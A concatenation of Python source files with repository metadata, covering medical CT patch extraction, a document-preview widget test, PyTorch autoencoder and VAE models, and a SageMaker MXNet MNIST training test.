CTPatches[i, :, :, c] = invols[c][I - dsize[0]: I + dsize[0],
J - dsize[1]: J + dsize[1],
K]
'''
MaskPatches[i, :, :, 0] = mask[I - dsize[0]: I + dsize[0] + 1,
J - dsize[1]:J + dsize[1] + 1,
K]
'''
# trying even-sided patches
MaskPatches[i, :, :, 0] = mask[I - dsize[0]: I + dsize[0],
J - dsize[1]:J + dsize[1],
K]
CTPatches = np.asarray(CTPatches, dtype=np.float16)
MaskPatches = np.asarray(MaskPatches, dtype=np.float16)
return CTPatches, MaskPatches
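# Editor's illustrative sketch (not part of the original module): a minimal,
# never-called example of get_patches on invented volumes. The volumes are
# padded first, as the training loop below does, so patches near the border
# stay in bounds; the resulting stack is half lesion-centred, half healthy-centred.
def _example_get_patches():
    ct = np.random.rand(64, 64, 8).astype(np.float32)
    mask = np.zeros((64, 64, 8), dtype=np.float32)
    mask[30:34, 30:34, 4] = 1.0                      # small synthetic lesion
    patchsize = np.array([16, 16])
    pad = np.max(patchsize + 1)
    ct, mask = PadImage(ct, pad), PadImage(mask, pad)
    patches, mask_patches = get_patches([ct], mask, patchsize,
                                        maxpatch=10, num_channels=1)
    # patches.shape == (20, 16, 16, 1); mask_patches.shape == (20, 16, 16, 1)
    return patches, mask_patches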
def CreatePatchesForTraining(atlasdir, plane, patchsize, max_patch=150000, num_channels=1):
    '''
    Builds the complete training patch set from a directory of paired CT and
    lesion-mask NIfTI volumes.
    Params:
        - atlasdir: string, directory containing files with "CT" and "mask" in their names
        - plane: string, one of "axial", "sagittal", "coronal"
        - patchsize: 2-element array-like, in-plane patch dimensions
        - max_patch: int, cap on the number of lesion patches taken per atlas volume
        - num_channels: int, number of input channels
    Returns:
        - (CTPatches, MaskPatches): shuffled 4D ndarrays of image patches and mask patches
    '''
# get filenames
ct_names = os.listdir(atlasdir)
mask_names = os.listdir(atlasdir)
ct_names = [x for x in ct_names if "CT" in x]
mask_names = [x for x in mask_names if "mask" in x]
ct_names.sort()
mask_names.sort()
numatlas = len(ct_names)
patchsize = np.asarray(patchsize, dtype=int)
padsize = np.max(patchsize + 1)# / 2
# calculate total number of voxels for all images to pre-allocate array
f = 0
for i in range(0, numatlas):
maskname = mask_names[i]
maskname = os.path.join(atlasdir, maskname)
temp = nib.load(maskname)
mask = temp.get_data()
f = f + np.sum(mask)
print("Total number of lesion patches =", f)
total_num_patches = int(np.minimum(max_patch * numatlas, f))
single_subject_num_patches = total_num_patches // numatlas
print("Allowed total number of patches =", total_num_patches)
# note here we double the size of the tensors to allow for healthy patches too
doubled_num_patches = total_num_patches * 2
if plane == "axial":
CT_matsize = (doubled_num_patches,
patchsize[0], patchsize[1], num_channels)
Mask_matsize = (doubled_num_patches, patchsize[0], patchsize[1], 1)
elif plane == "sagittal":
CT_matsize = (doubled_num_patches,
patchsize[0], 16, num_channels)
Mask_matsize = (doubled_num_patches, patchsize[0], 16, 1)
elif plane == "coronal":
CT_matsize = (doubled_num_patches,
16, patchsize[1], num_channels)
Mask_matsize = (doubled_num_patches, 16, patchsize[1], 1)
CTPatches = np.zeros(CT_matsize, dtype=np.float16)
MaskPatches = np.zeros(Mask_matsize, dtype=np.float16)
indices = [x for x in range(doubled_num_patches)]
indices = shuffle(indices, random_state=0)
cur_idx = 0
# interpret plane
planar_codes = {"axial": (0, 1, 2),
"sagittal": (1, 2, 0),
"coronal": (2, 0, 1)}
planar_code = planar_codes[plane]
for i in tqdm(range(0, numatlas)):
ctname = ct_names[i]
ctname = os.path.join(atlasdir, ctname)
temp = nib.load(ctname)
ct = temp.get_data()
ct = np.asarray(ct, dtype=np.float16)
maskname = mask_names[i]
maskname = os.path.join(atlasdir, maskname)
temp = nib.load(maskname)
mask = temp.get_data()
mask = np.asarray(mask, dtype=np.float16)
# here, need to ensure that the CT and mask tensors
# are padded out to larger than the size of the requested
# patches, to allow for patches to be gathered from edges
ct = PadImage(ct, padsize)
mask = PadImage(mask, padsize)
ct = np.transpose(ct, axes=planar_code)
mask = np.transpose(mask, axes=planar_code)
invols = [ct] # can handle multichannel here
# adjusting patch size after transpose
if ct.shape[0] < ct.shape[1]:
patchsize = (ct.shape[0]//4, patchsize[1])
if ct.shape[1] < ct.shape[0]:
patchsize = (patchsize[0], ct.shape[1]//4)
patchsize = np.asarray(patchsize, dtype=int)
CTPatchesA, MaskPatchesA = get_patches(invols,
mask,
patchsize,
single_subject_num_patches,
num_channels,)
CTPatchesA = np.asarray(CTPatchesA, dtype=np.float16)
MaskPatchesA = np.asarray(MaskPatchesA, dtype=np.float16)
for ct_patch, mask_patch in zip(CTPatchesA, MaskPatchesA):
CTPatches[indices[cur_idx], :, :, :] = ct_patch
MaskPatches[indices[cur_idx], :, :, :] = mask_patch
cur_idx += 1
return (CTPatches, MaskPatches)
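# Editor's illustrative sketch (not part of the original module): the expected
# on-disk layout and a typical call. The directory and file names below are
# hypothetical; the function pairs files containing "CT" with files containing
# "mask" after sorting, so the two lists must correspond one-to-one.
def _example_create_patches_for_training():
    # atlas_dir/
    #     subj01_CT.nii.gz      subj01_mask.nii.gz
    #     subj02_CT.nii.gz      subj02_mask.nii.gz
    atlas_dir = "/path/to/atlas_dir"                 # hypothetical path
    ct_patches, mask_patches = CreatePatchesForTraining(
        atlasdir=atlas_dir,
        plane="axial",
        patchsize=(128, 128),
        max_patch=150000,
        num_channels=1)
    return ct_patches, mask_patches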
| 39.635135
| 95
| 0.58285
|
34aa8a2d07ded6dc43ebc75fcf00745161f11c66
| 625
|
py
|
Python
|
mayan/apps/documents/tests/test_widgets.py
|
CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons
|
0e4e919fd2e1ded6711354a0330135283e87f8c7
|
[
"Apache-2.0"
] | 2
|
2021-09-12T19:41:19.000Z
|
2021-09-12T19:41:20.000Z
|
mayan/apps/documents/tests/test_widgets.py
|
CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons
|
0e4e919fd2e1ded6711354a0330135283e87f8c7
|
[
"Apache-2.0"
] | 37
|
2021-09-13T01:00:12.000Z
|
2021-10-02T03:54:30.000Z
|
mayan/apps/documents/tests/test_widgets.py
|
CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons
|
0e4e919fd2e1ded6711354a0330135283e87f8c7
|
[
"Apache-2.0"
] | 1
|
2021-09-22T13:17:30.000Z
|
2021-09-22T13:17:30.000Z
|
from ..permissions import permission_document_view
from .base import GenericDocumentViewTestCase
from .mixins.document_mixins import DocumentViewTestMixin
class DocumentPreviewWidgetViewTestCase(
DocumentViewTestMixin, GenericDocumentViewTestCase
):
def test_document_preview_page_carousel_widget_render(self):
self.grant_access(
obj=self.test_document, permission=permission_document_view
)
response = self._request_test_document_preview_view()
self.assertContains(
response=response, status_code=200, text='carousel-container'
)
| 32.894737
| 74
| 0.7456
|
8b42b65931a12ee271904e43b8583056fc8b3e9f
| 22,096
|
py
|
Python
|
models/autoencoders.py
|
caotians1/OD-test-master
|
e272421294a3614bdcdb3a4e4b530f613dad1a1c
|
[
"MIT"
] | 3
|
2020-10-07T18:35:50.000Z
|
2021-02-23T06:36:21.000Z
|
models/autoencoders.py
|
caotians1/OD-test-master
|
e272421294a3614bdcdb3a4e4b530f613dad1a1c
|
[
"MIT"
] | null | null | null |
models/autoencoders.py
|
caotians1/OD-test-master
|
e272421294a3614bdcdb3a4e4b530f613dad1a1c
|
[
"MIT"
] | 3
|
2020-10-08T14:38:15.000Z
|
2021-11-08T11:51:48.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import math
"""
The VAE code is based on
https://github.com/pytorch/examples/blob/master/vae/main.py
The p(x|z) decoder is a Bernoulli distribution rather than a Gaussian.
"""
class ELU_BatchNorm2d(torch.nn.Module):
def __init__(self, filters):
super(ELU_BatchNorm2d, self).__init__()
self.bn = torch.nn.BatchNorm2d(filters)
def forward(self, x):
return self.bn(F.elu(x))
class ResidualBlock(torch.nn.Module):
def __init__(self, filters, kernel_size):
super(ResidualBlock, self).__init__()
self.ops = torch.nn.Sequential(*[
torch.nn.Conv2d(filters, filters, kernel_size=kernel_size, padding=(kernel_size - 1) // 2, bias=False),
ELU_BatchNorm2d(filters),
torch.nn.Conv2d(filters, filters, kernel_size=kernel_size, padding=(kernel_size - 1) // 2, bias=False),
torch.nn.BatchNorm2d(filters)
])
def forward(self, x):
return F.elu(x + self.ops(x))
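# Editor's illustrative sketch (not part of the original module): ResidualBlock
# preserves the (N, C, H, W) shape of its input; the tensor below is invented
# purely to show that property.
def _example_residual_block():
    block = ResidualBlock(filters=16, kernel_size=3)
    x = torch.rand(2, 16, 8, 8)
    y = block(x)            # same shape as x: (2, 16, 8, 8)
    return y.shape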
class Residual_AE(nn.Module):
def __init__(self, dims, max_channels=1024, depth=7, n_hidden=1024):
assert len(dims) == 3, 'Please specify 3 values for dims'
super(Residual_AE, self).__init__()
kernel_size = 3
current_channels = 16
self.epoch_factor = max(1, n_hidden//256)
self.default_sigmoid = False
self.netid = 'max.%d.d.%d.nH.%d'%(max_channels, depth, n_hidden)
# encoder ###########################################
modules = []
spatial_sizes = [(dims[1], dims[2])]
modules.append(torch.nn.Conv2d(in_channels=dims[0], out_channels=current_channels, kernel_size=kernel_size, padding=(kernel_size-1)//2, bias=False))
modules.append(torch.nn.BatchNorm2d(current_channels))
modules.append(torch.nn.ELU())
for i in range(depth):
modules.append(ResidualBlock(current_channels, kernel_size))
next_channels = min(current_channels * 2, max_channels)
modules.append(torch.nn.Conv2d(current_channels, next_channels, kernel_size=3, stride=2, bias=False, padding=1))
current_channels = next_channels
modules.append(ELU_BatchNorm2d(current_channels))
spatial_sizes.append(( math.floor(((spatial_sizes[-1][0]-1)/2) + 1), math.floor(((spatial_sizes[-1][1]-1)/2) + 1) ))
# Bottleneck layer
modules.append(ELU_BatchNorm2d(current_channels))
modules.append(ResidualBlock(filters=current_channels, kernel_size=kernel_size))
self.encoder = nn.Sequential(*modules)
#
# # decoder ###########################################
modules = []
out_pads = self._calculate_out_pad(spatial_sizes)
for i in range(depth):
next_channels = current_channels//2
modules.append(torch.nn.ConvTranspose2d(current_channels, next_channels,
kernel_size=3, stride=2, bias=False, padding=1, output_padding=out_pads[i]))
current_channels = next_channels
modules.append(ELU_BatchNorm2d(current_channels))
modules.append(ResidualBlock(current_channels, kernel_size))
# Final layer
modules.append(nn.Conv2d(current_channels, dims[0], kernel_size=kernel_size, padding=(kernel_size-1)//2, bias=False))
self.decoder = nn.Sequential(*modules)
def _calculate_out_pad(self, spatial_sizes, stride=2, padding=1, kernel_size=3, d=1):
out_pad = []
for i in reversed(range(1, len(spatial_sizes))):
            current = spatial_sizes[i]
            target = spatial_sizes[i - 1]  # renamed from "next" to avoid shadowing the builtin
            pad = [0, 0]
            for j in range(len(current)):
                outputsize = (current[j] - 1) * stride - 2 * padding + (kernel_size - 1) * d + 1
                if outputsize < target[j]:
                    pad[j] = 1
            out_pad.append(pad)
return out_pad
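    # Editor's illustrative note (not part of the original module): a worked
    # example of the output_padding arithmetic above. With stride=2, padding=1,
    # kernel_size=3, an encoder input of size 8 downsamples to floor((8-1)/2)+1 = 4,
    # and the transposed conv maps 4 back to (4-1)*2 - 2*1 + (3-1) + 1 = 7; recovering
    # the original 8 therefore needs output_padding = 1, which is exactly the case
    # _calculate_out_pad detects (7 < 8). An input of size 7 also downsamples to 4,
    # but 7 is recovered with output_padding = 0, so no extra padding is flagged.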
def encode(self, x):
n_samples = x.size(0)
code = self.encoder(x)
out = code.view(n_samples, -1) # flatten to vectors.
return out
def forward(self, x, sigmoid=False):
enc = self.encoder(x)
dec = self.decoder(enc)
if sigmoid or self.default_sigmoid:
dec = F.sigmoid(dec)
return dec
def train_config(self):
config = {}
config['optim'] = optim.Adam(self.parameters(), lr=1e-3)
config['scheduler'] = optim.lr_scheduler.ReduceLROnPlateau(config['optim'], patience=10, threshold=1e-3, min_lr=1e-6, factor=0.1, verbose=True)
config['max_epoch'] = 240 * self.epoch_factor
return config
def preferred_name(self):
return self.__class__.__name__+"."+self.netid
class Generic_AE(nn.Module):
def __init__(self, dims, max_channels=512, depth=10, n_hidden=256):
assert len(dims) == 3, 'Please specify 3 values for dims'
super(Generic_AE, self).__init__()
kernel_size = 3
all_channels = []
current_channels = 64
nonLin = nn.ELU
self.epoch_factor = max(1, n_hidden//256)
self.default_sigmoid = False
max_pool_layers = [i%2==0 for i in range(depth)]
remainder_layers = []
self.netid = 'max.%d.d.%d.nH.%d'%(max_channels, depth, n_hidden)
# encoder ###########################################
modules = []
in_channels = dims[0]
in_spatial_size = dims[1]
for i in range(depth):
modules.append(nn.Conv2d(in_channels, current_channels, kernel_size=kernel_size, padding=(kernel_size-1)//2))
modules.append(nn.BatchNorm2d(current_channels))
modules.append(nonLin())
in_channels = current_channels
all_channels.append(current_channels)
if max_pool_layers[i]:
modules.append(nn.MaxPool2d(2))
current_channels = min(current_channels * 2, max_channels)
remainder_layers.append(in_spatial_size % 2)
in_spatial_size = math.floor(in_spatial_size/2)
# Final layer
modules.append(nn.Conv2d(in_channels, n_hidden, kernel_size=kernel_size, padding=(kernel_size-1)//2))
modules.append(nn.BatchNorm2d(n_hidden))
modules.append(nonLin())
self.encoder = nn.Sequential(*modules)
# decoder ###########################################
modules = []
in_channels = n_hidden
if self.__class__ == Generic_VAE:
in_channels = in_channels // 2
current_index = len(all_channels)-1
r_ind = len(remainder_layers)-1
for i in range(depth):
modules.append(nn.Conv2d(in_channels, all_channels[current_index], kernel_size=kernel_size, padding=(kernel_size-1)//2))
modules.append(nn.BatchNorm2d(all_channels[current_index]))
modules.append(nonLin())
if max_pool_layers[i]:
modules.append(nn.Upsample(scale_factor=2, mode='nearest'))
if remainder_layers[r_ind] > 0:
modules.append(nn.ZeroPad2d((1,0,1,0)))
r_ind -= 1
in_channels = all_channels[current_index]
current_index -= 1
# Final layer
modules.append(nn.Conv2d(in_channels, dims[0], kernel_size=kernel_size, padding=(kernel_size-1)//2))
self.decoder = nn.Sequential(*modules)
def encode(self, x):
n_samples = x.size(0)
code = self.encoder(x)
out = code.view(n_samples, -1) # flatten to vectors.
return out
def forward(self, x, sigmoid=False):
enc = self.encoder(x)
dec = self.decoder(enc)
if sigmoid or self.default_sigmoid:
dec = F.sigmoid(dec)
return dec
def train_config(self):
config = {}
config['optim'] = optim.Adam(self.parameters(), lr=1e-3)
config['scheduler'] = optim.lr_scheduler.ReduceLROnPlateau(config['optim'], patience=10, threshold=1e-3, min_lr=1e-6, factor=0.1, verbose=True)
config['max_epoch'] = 240 * self.epoch_factor
return config
def preferred_name(self):
return self.__class__.__name__+"."+self.netid
class Generic_VAE(Generic_AE):
def __init__(self, dims, max_channels=512, depth=10, n_hidden=256):
super(Generic_VAE, self).__init__(dims, max_channels, depth, 2*n_hidden)
self.fc_e_mu = nn.Linear(2*n_hidden, n_hidden)
self.fc_e_std = nn.Linear(2*n_hidden, n_hidden)
def reparameterize(self, mu, logvar):
if self.training:
std = torch.exp(0.5*logvar)
eps = torch.randn_like(std)
return eps.mul(std).add_(mu)
else:
return mu
def encode(self, x):
n_samples = x.size(0)
h_out = self.encoder(x)
code = self.fc_e_mu(h_out.view(n_samples, -1))
return code
def forward(self, x):
enc = self.encoder(x)
n_size = enc.size(0)
mu, logvar = self.fc_e_mu(enc.view(n_size, -1)), self.fc_e_std(enc.view(n_size, -1))
self.last_mu = mu
self.last_std = logvar
z = self.reparameterize(mu, logvar)
dec = self.decoder(z.view(n_size, enc.size(1)//2, enc.size(2), enc.size(3)))
dec = F.sigmoid(dec)
return dec
class ALILikeAE(nn.Module):
def __init__(self, dims, max_channels=1024, depth=6, n_hidden=512):
assert len(dims) == 3, 'Please specify 3 values for dims'
super(ALILikeAE, self).__init__()
EncKernel = [2, 7, 5, 7, 4, 1]
EncStride = [1, 2, 2, 2, 1, 1]
EncDepth = [64, 128, 256, 512, 512, n_hidden]
# Generator param
GenKernel = [4, 7, 5, 7, 2, 1]
GenStride = [1, 2, 2, 2, 1, 1]
GenDepth = [256, 128, 64, 32, 32, dims[0]]
self.epoch_factor = max(1, n_hidden//256)
self.default_sigmoid = False
remainder_layers = []
self.netid = 'max.%d.d.%d.nH.%d'%(max_channels, depth, n_hidden)
# encoder ###########################################
modules = []
in_channels = dims[0]
for i in range(depth):
modules.append(nn.Conv2d(in_channels, EncDepth[i], kernel_size=EncKernel[i], padding=0, stride=EncStride[i]))
modules.append(torch.nn.LeakyReLU(0.1, inplace=True))
modules.append(nn.BatchNorm2d(EncDepth[i]))
in_channels = EncDepth[i]
self.encoder = nn.Sequential(*modules)
self.fc_e_mu = nn.Linear(2 * n_hidden, n_hidden)
self.fc_e_std = nn.Linear(2 * n_hidden, n_hidden)
# decoder ###########################################
modules = []
in_channels = n_hidden
if self.__class__ == Generic_VAE:
in_channels = in_channels // 2
for i in range(depth):
modules.append(nn.ConvTranspose2d(in_channels, GenDepth[i], kernel_size=GenKernel[i], padding=0, stride=GenStride[i]))
modules.append(torch.nn.ReLU(True))
modules.append(nn.BatchNorm2d(GenDepth[i]))
in_channels = GenDepth[i]
# Final layer
self.decoder = nn.Sequential(*modules)
def encode(self, x):
n_samples = x.size(0)
code = self.encoder(x)
out = code.view(n_samples, -1) # flatten to vectors.
return out
def forward(self, x, sigmoid=False):
enc = self.encoder(x)
dec = self.decoder(enc)
if sigmoid or self.default_sigmoid:
            dec = (F.tanh(dec) + 1) / 2.  # note: despite the sigmoid flag name, this rescales a tanh output to [0, 1]
return dec
def train_config(self):
config = {}
config['optim'] = optim.Adam(self.parameters(), lr=1e-3)
config['scheduler'] = optim.lr_scheduler.ReduceLROnPlateau(config['optim'], patience=10, threshold=1e-3, min_lr=1e-6, factor=0.1, verbose=True)
config['max_epoch'] = 240 * self.epoch_factor
return config
def preferred_name(self):
return self.__class__.__name__+"."+self.netid
class ALILikeVAE(nn.Module):
def __init__(self, dims, max_channels=1024, depth=6, n_hidden=512):
assert len(dims) == 3, 'Please specify 3 values for dims'
super(ALILikeVAE, self).__init__()
EncKernel = [2, 7, 5, 7, 4]
EncStride = [1, 2, 2, 2, 1]
EncDepth = [64, 128, 256, 512, 512]
# Generator param
GenKernel = [4, 7, 5, 7, 2, 1]
GenStride = [1, 2, 2, 2, 1, 1]
GenDepth = [256, 128, 64, 32, 32, dims[0]]
self.epoch_factor = max(1, n_hidden//256)
self.default_sigmoid = False
remainder_layers = []
self.netid = 'max.%d.d.%d.nH.%d'%(max_channels, depth, n_hidden)
# encoder ###########################################
modules = []
in_channels = dims[0]
for i in range(depth-1):
modules.append(nn.Conv2d(in_channels, EncDepth[i], kernel_size=EncKernel[i], padding=0, stride=EncStride[i]))
modules.append(torch.nn.LeakyReLU(0.1, inplace=True))
modules.append(nn.BatchNorm2d(EncDepth[i]))
in_channels = EncDepth[i]
self.fc_e_mu = nn.Linear(in_channels, n_hidden)
self.fc_e_std = nn.Linear(in_channels, n_hidden)
self.encoder = nn.Sequential(*modules)
# decoder ###########################################
modules = []
in_channels = n_hidden
if self.__class__ == Generic_VAE:
in_channels = in_channels // 2
for i in range(depth):
modules.append(nn.ConvTranspose2d(in_channels, GenDepth[i], kernel_size=GenKernel[i], padding=0, stride=GenStride[i]))
modules.append(torch.nn.ReLU(True))
modules.append(nn.BatchNorm2d(GenDepth[i]))
in_channels = GenDepth[i]
# Final layer
self.decoder = nn.Sequential(*modules)
def reparameterize(self, mu, logvar):
if self.training:
std = torch.exp(0.5*logvar)
eps = torch.randn_like(std)
return eps.mul(std).add_(mu)
else:
return mu
def encode(self, x):
n_samples = x.size(0)
h_out = self.encoder(x)
code = self.fc_e_mu(h_out.view(n_samples, -1))
return code
def forward(self, x):
enc = self.encoder(x)
n_size = enc.size(0)
mu, logvar = self.fc_e_mu(enc.view(n_size, -1)), self.fc_e_std(enc.view(n_size, -1))
self.last_mu = mu
self.last_std = logvar
z = self.reparameterize(mu, logvar)
dec = self.decoder(z.view(n_size, -1, enc.size(2), enc.size(3)))
dec = (F.tanh(dec) + 1.0)/ 2.0
return dec
def train_config(self):
config = {}
config['optim'] = optim.Adam(self.parameters(), lr=1e-3)
config['scheduler'] = optim.lr_scheduler.ReduceLROnPlateau(config['optim'], patience=10, threshold=1e-3, min_lr=1e-6, factor=0.1, verbose=True)
config['max_epoch'] = 240 * self.epoch_factor
return config
def preferred_name(self):
return self.__class__.__name__+"."+self.netid
class ALILikeResAE(nn.Module):
def __init__(self, dims, max_channels=1024, depth=6, n_hidden=512):
assert len(dims) == 3, 'Please specify 3 values for dims'
super(ALILikeResAE, self).__init__()
EncKernel = [2, 7, 5, 7, 4, 1]
EncStride = [1, 2, 2, 2, 1, 1]
EncDepth = [64, 128, 256, 512, 512, n_hidden]
# Generator param
GenKernel = [4, 7, 5, 7, 2, 1]
GenStride = [1, 2, 2, 2, 1, 1]
GenDepth = [256, 128, 64, 32, 32, dims[0]]
self.epoch_factor = max(1, n_hidden//256)
self.default_sigmoid = False
remainder_layers = []
self.netid = 'max.%d.d.%d.nH.%d'%(max_channels, depth, n_hidden)
# encoder ###########################################
modules = []
in_channels = dims[0]
for i in range(depth):
modules.append(nn.Conv2d(in_channels, EncDepth[i], kernel_size=EncKernel[i], padding=0, stride=EncStride[i]))
modules.append(torch.nn.LeakyReLU(0.1, inplace=True))
modules.append(nn.BatchNorm2d(EncDepth[i]))
modules.append(ResidualBlock(EncDepth[i], 3))
modules.append(ELU_BatchNorm2d(EncDepth[i]))
in_channels = EncDepth[i]
self.encoder = nn.Sequential(*modules)
self.fc_e_mu = nn.Linear(2 * n_hidden, n_hidden)
self.fc_e_std = nn.Linear(2 * n_hidden, n_hidden)
# decoder ###########################################
modules = []
in_channels = n_hidden
if self.__class__ == Generic_VAE:
in_channels = in_channels // 2
for i in range(depth):
modules.append(nn.ConvTranspose2d(in_channels, GenDepth[i], kernel_size=GenKernel[i], padding=0, stride=GenStride[i]))
modules.append(torch.nn.ReLU(True))
modules.append(nn.BatchNorm2d(GenDepth[i]))
modules.append(ResidualBlock(GenDepth[i], 3))
modules.append(ELU_BatchNorm2d(GenDepth[i]))
in_channels = GenDepth[i]
# Final layer
self.decoder = nn.Sequential(*modules)
def encode(self, x):
n_samples = x.size(0)
code = self.encoder(x)
out = code.view(n_samples, -1) # flatten to vectors.
return out
def forward(self, x, sigmoid=False):
enc = self.encoder(x)
dec = self.decoder(enc)
if sigmoid or self.default_sigmoid:
            dec = (F.tanh(dec) + 1) / 2.  # note: despite the sigmoid flag name, this rescales a tanh output to [0, 1]
return dec
def train_config(self):
config = {}
config['optim'] = optim.Adam(self.parameters(), lr=1e-3)
config['scheduler'] = optim.lr_scheduler.ReduceLROnPlateau(config['optim'], patience=10, threshold=1e-3, min_lr=1e-6, factor=0.1, verbose=True)
config['max_epoch'] = 240 * self.epoch_factor
return config
def preferred_name(self):
return self.__class__.__name__+"."+self.netid
class ALILikeResVAE(nn.Module):
def __init__(self, dims, max_channels=1024, depth=6, n_hidden=512):
assert len(dims) == 3, 'Please specify 3 values for dims'
super(ALILikeResVAE, self).__init__()
EncKernel = [2, 7, 5, 7, 4]
EncStride = [1, 2, 2, 2, 1]
EncDepth = [64, 128, 256, 512, 512]
# Generator param
GenKernel = [4, 7, 5, 7, 2, 1]
GenStride = [1, 2, 2, 2, 1, 1]
GenDepth = [256, 128, 64, 32, 32, dims[0]]
self.epoch_factor = max(1, n_hidden//256)
self.default_sigmoid = False
remainder_layers = []
self.netid = 'max.%d.d.%d.nH.%d'%(max_channels, depth, n_hidden)
# encoder ###########################################
modules = []
in_channels = dims[0]
for i in range(depth-1):
modules.append(nn.Conv2d(in_channels, EncDepth[i], kernel_size=EncKernel[i], padding=0, stride=EncStride[i]))
modules.append(torch.nn.LeakyReLU(0.1, inplace=True))
modules.append(nn.BatchNorm2d(EncDepth[i]))
modules.append(ResidualBlock(EncDepth[i], 3))
modules.append(ELU_BatchNorm2d(EncDepth[i]))
in_channels = EncDepth[i]
self.fc_e_mu = nn.Linear(in_channels, n_hidden)
self.fc_e_std = nn.Linear(in_channels, n_hidden)
self.encoder = nn.Sequential(*modules)
# decoder ###########################################
modules = []
in_channels = n_hidden
if self.__class__ == Generic_VAE:
in_channels = in_channels // 2
for i in range(depth):
modules.append(nn.ConvTranspose2d(in_channels, GenDepth[i], kernel_size=GenKernel[i], padding=0, stride=GenStride[i]))
modules.append(torch.nn.ReLU(True))
modules.append(nn.BatchNorm2d(GenDepth[i]))
modules.append(ResidualBlock(GenDepth[i], 3))
modules.append(ELU_BatchNorm2d(GenDepth[i]))
in_channels = GenDepth[i]
# Final layer
self.decoder = nn.Sequential(*modules)
def reparameterize(self, mu, logvar):
if self.training:
std = torch.exp(0.5*logvar)
eps = torch.randn_like(std)
return eps.mul(std).add_(mu)
else:
return mu
def encode(self, x):
n_samples = x.size(0)
h_out = self.encoder(x)
code = self.fc_e_mu(h_out.view(n_samples, -1))
return code
def forward(self, x):
enc = self.encoder(x)
n_size = enc.size(0)
mu, logvar = self.fc_e_mu(enc.view(n_size, -1)), self.fc_e_std(enc.view(n_size, -1))
self.last_mu = mu
self.last_std = logvar
z = self.reparameterize(mu, logvar)
dec = self.decoder(z.view(n_size, -1, enc.size(2), enc.size(3)))
dec = (F.tanh(dec) + 1.0)/ 2.0
return dec
def train_config(self):
config = {}
config['optim'] = optim.Adam(self.parameters(), lr=1e-3)
config['scheduler'] = optim.lr_scheduler.ReduceLROnPlateau(config['optim'], patience=10, threshold=1e-3, min_lr=1e-6, factor=0.1, verbose=True)
config['max_epoch'] = 240 * self.epoch_factor
return config
def preferred_name(self):
return self.__class__.__name__+"."+self.netid
class VAE_Loss(nn.Module):
def __init__(self, VAE_model, BCE):
super(VAE_Loss, self).__init__()
#assert VAE_model.__class__ == Generic_VAE, 'Only Generic_VAEs are accepted.'
self.VAE = VAE_model
self.size_average = True
self.reduction = 'sum'
if BCE:
self.loss = nn.BCELoss(size_average=False)
else:
self.loss = nn.MSELoss(size_average=False)
def forward(self, X, Y):
BCE_loss = self.loss(X, Y)
mu, logvar = self.VAE.last_mu, self.VAE.last_std
        # closed-form KL divergence between q(z|x) = N(mu, sigma^2) and the standard normal prior
        KLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())
return (BCE_loss + KLD)/X.numel()
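# Editor's illustrative sketch (not part of the original module): a minimal,
# never-called training step showing how Generic_VAE and VAE_Loss fit together.
# The input size, batch size, and hyperparameters below are invented for the example.
def _example_vae_step():
    model = Generic_VAE(dims=(3, 32, 32), max_channels=512, depth=10, n_hidden=256)
    criterion = VAE_Loss(model, BCE=True)
    config = model.train_config()
    x = torch.rand(4, 3, 32, 32)          # batch of images scaled to [0, 1]
    recon = model(x)                      # forward() also caches last_mu / last_std
    loss = criterion(recon, x)            # reconstruction term + KL divergence
    config['optim'].zero_grad()
    loss.backward()
    config['optim'].step()
    return loss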
| 38.901408
| 156
| 0.58445
|
0b46d45c4c153c8f5beb5fd039fd957847f7b7cd
| 2,406
|
py
|
Python
|
test/integration/local/test_mnist_training.py
|
leezu/sagemaker-mxnet-container
|
578c8df7817b5361ee568dbf8e99659432fbf729
|
[
"Apache-2.0"
] | null | null | null |
test/integration/local/test_mnist_training.py
|
leezu/sagemaker-mxnet-container
|
578c8df7817b5361ee568dbf8e99659432fbf729
|
[
"Apache-2.0"
] | 1
|
2020-02-19T03:03:35.000Z
|
2020-02-19T03:03:35.000Z
|
test/integration/local/test_mnist_training.py
|
leezu/sagemaker-mxnet-container
|
578c8df7817b5361ee568dbf8e99659432fbf729
|
[
"Apache-2.0"
] | 1
|
2019-09-17T02:03:44.000Z
|
2019-09-17T02:03:44.000Z
|
# Copyright 2018-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
from __future__ import absolute_import
import os
import pytest
from sagemaker.mxnet import MXNet
import local_mode_utils
from test.integration import MODEL_SUCCESS_FILES, RESOURCE_PATH
MNIST_PATH = os.path.join(RESOURCE_PATH, 'mnist')
SCRIPT_PATH = os.path.join(MNIST_PATH, 'mnist.py')
TRAIN_INPUT = 'file://{}'.format(os.path.join(MNIST_PATH, 'train'))
TEST_INPUT = 'file://{}'.format(os.path.join(MNIST_PATH, 'test'))
def test_single_machine(docker_image, sagemaker_local_session, local_instance_type,
framework_version, tmpdir):
mx = MXNet(entry_point=SCRIPT_PATH, role='SageMakerRole', train_instance_count=1,
train_instance_type=local_instance_type, sagemaker_session=sagemaker_local_session,
image_name=docker_image, framework_version=framework_version,
output_path='file://{}'.format(tmpdir))
_train_and_assert_success(mx, str(tmpdir))
def test_distributed(docker_image, sagemaker_local_session, framework_version, processor, tmpdir):
if processor == 'gpu':
pytest.skip('Local Mode does not support distributed training on GPU.')
mx = MXNet(entry_point=SCRIPT_PATH, role='SageMakerRole', train_instance_count=2,
train_instance_type='local', sagemaker_session=sagemaker_local_session,
image_name=docker_image, framework_version=framework_version,
output_path='file://{}'.format(tmpdir),
hyperparameters={'sagemaker_parameter_server_enabled': True})
_train_and_assert_success(mx, str(tmpdir))
def _train_and_assert_success(estimator, output_path):
estimator.fit({'train': TRAIN_INPUT, 'test': TEST_INPUT})
for directory, files in MODEL_SUCCESS_FILES.items():
local_mode_utils.assert_output_files_exist(output_path, directory, files)
| 41.482759
| 98
| 0.743558
|